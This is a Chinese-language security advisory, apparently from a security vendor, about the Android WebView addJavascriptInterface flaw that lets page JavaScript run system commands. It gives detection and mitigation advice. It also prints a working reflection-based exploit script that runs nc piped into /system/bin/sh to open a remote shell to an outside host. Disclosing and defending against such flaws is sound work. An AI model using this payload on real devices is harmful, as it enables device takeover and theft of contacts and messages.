紧急公告：Android系统webview控件接口存安全隐患

日前，谷歌旗下Android系统爆出webview控件存在接口安全隐患，会令绝大部分使用Andorid系统为核心的设备沦为黑客的“玩物”。目前，包括微信、手机QQ、遨游云浏览器等多款Andorid应用已在漏洞报告平台乌云被曝光可以进行手机挂马，当用户打开挂马页面后，手机就会自动执行黑客指令，出现被安装恶意扣费软件、向好友发送欺诈短信、通讯录和短信被窃取等严重后果。

安恒信息提醒开放手机业务的相关企事业单位尽快进行自检修复。

一、webView及addJavaScriptInterface简介: Android SDK中封装了一个webview控件，主要用于控制网页浏览，甚至可以简单的认为是个小型浏览器。其中包含了一个接口函数addJavascriptInterface，通过这个函数能让js代码调用java类对象的一切函数和属性。

二、漏洞分析：

一般在android代码中，这样实现：

settings.setJavaScriptEnabled(true);

settings.setJavaScriptCanOpenWindowsAutomatically(true); mWebView.addJavascriptInterface(new MyClass(), "javaObj");

这个时候可以认为，webview将MyClass类的一个实例化的对象，名字叫javaObj，传递到了js中，js可以通过javaObj对象调用MyClass类的所有方法和属性。

但是设计者没有考虑到，一个后台的类对象可以通过forName()和getMethod()方法获得其他类对象的特定方法，比如下面的代码：

<script> function execute(cmdArgs) { return XXX.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); } execute(["/system/bin/sh","-c","nc 192.168.1.9 8088|/system/bin/sh|nc 192.168.1.9 9999"]); </script>

以上就是漏洞形成的根本原因，可以认为是这个接口函数给了前端页面一个调用后台java代码的机会，并且本意只是让前台调用通过这个接口函数传递过来的java类对象的方法和属性，但是没注意到后台的java类对象能获取如此大的权限以执行除了该对象的方法和属性意外的类的方法。

三、漏洞防护与检测：

1. 通过反编译apk获取smali文件中的代码，或者再通过方便易smali到java文件，检测smali和java文件中的代码，查看手机应用是否存在这个漏洞；

2. 通过检测传入的参数是否存在执行linux命令，或者存在shellcode；

3. 检测手机流量，发现其中是否存在异常流量。